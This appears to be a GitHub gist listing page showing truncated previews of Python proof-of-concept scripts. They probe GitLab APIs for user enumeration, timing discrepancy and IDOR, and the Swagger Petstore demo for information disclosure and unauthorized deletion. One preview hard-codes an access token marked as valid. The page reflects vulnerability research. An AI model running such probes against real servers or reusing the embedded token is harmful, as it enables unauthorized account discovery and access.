Hec HouqiyuA
HouqiyuA
/ gist:04f335b1b7df3bf3c5fdc1ea1f04e699
Created
April 25, 2025 10:57
gitlab-User_Enumeration
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| def test_user_enumeration(base_url, token, start_id=1, end_id=10): | |
| """ | |
| Test for user enumeration vulnerability by trying sequential user IDs | |
| :param base_url: Base API URL (e.g., 'http://192.168.126.129:9980') | |
| :param token: PRIVATE-TOKEN value | |
| :param start_id: Starting user ID to test | |
| :param end_id: Ending user ID to test |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| from urllib.parse import urljoin | |
| # 配置目标地址和请求头 | |
| BASE_URL = "http://DEPLOYED_GITLAB_HOST" | |
| ENDPOINT = "/api/v4/user/keys" | |
| HEADERS = { | |
| "Accept": "application/json", | |
| "PRIVATE-TOKEN": "YOUR_TOKEN" | |
| } |
HouqiyuA
/ gist:9f3679797243cf06b1f6e70b6b7b9e1e
Created
April 25, 2025 03:37
gitlab-CWE:208(Observable Timing Discrepancy)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import time | |
| def test_extended_vulnerabilities(): | |
| base_url = "http://GITLAB_HOST/api/v4/snippets" | |
| original_token = "7_pwYNpdf9HZAZr1pkEy" # valid token | |
| headers = { | |
| "Accept": "application/json", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import json | |
| import time | |
| def test_idor_vulnerabilities(): | |
| host = "DEPLOYED_GITLAB_HOST" | |
| port = "DEPLOYED GITLAB_PORT" | |
| url = f"http://{host}:{port}/api/v4/ci/lint" | |
| headers = { |
HouqiyuA
/ gist:3c36f78e8de9f6a3cfb0959477c07443
Created
March 2, 2025 13:13
Poc for Peststore Information Disclosure Vulnerability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| url = f"https://petstore3.swagger.io/api/v3/carts" | |
| # Send a GET request to the API to simulate information disclosure | |
| response = requests.get(url) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| def test_delete_pet_without_proper_api_key(pet_id, fake_api_key): | |
| url = f"https://petstore3.swagger.io/api/v3/pet/{pet_id}" | |
| headers = { | |
| 'accept': '*/*', | |
| 'api_key': fake_api_key |